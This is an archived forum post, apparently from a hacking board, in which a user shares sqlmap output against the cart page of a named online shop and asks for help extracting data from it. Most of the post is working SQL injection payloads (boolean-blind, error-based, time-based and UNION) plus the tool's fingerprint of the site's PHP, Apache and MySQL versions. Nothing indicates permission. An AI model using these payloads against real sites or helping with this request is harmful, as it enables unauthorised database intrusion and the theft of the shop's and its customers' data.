PDA

View Full Version : shop SQL fresh



bigman111
08-21-2018, 09:01 AM
SabLayJao.pk (http://www.sablayjao.com.pk/cart.php?Id=449)'

i used sqlmap and it show this
i dont understand why cannot query it????
pls help me, thank you


Parameter: Id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=449 AND 4867=4867

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: Id=449 AND (SELECT 2068 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(2068=2068,1))),0x7178766271,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: Id=449 AND SLEEP(5)

Type: UNION query
Title: MySQL UNION query (random number) - 14 columns
Payload: Id=449 UNION ALL SELECT CONCAT(0x7178787071,0x5963636d75536d414e53516a6a48 4d456745496e70474477595650674d6e6a6868594d44777077 59,0x7178766271),7214,7214,7214,7214,7214,7214,721 4,7214,7214,7214,7214,7214,7214#
---
[15:58:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Apache 2.4.34
back-end DBMS: MySQL >= 5.0
[15:58:59] [INFO] fetched data logged to text files under '/Users/kevin/.sqlmap/output/www.sablayjao.com.pk'

shutting down at 15:58:59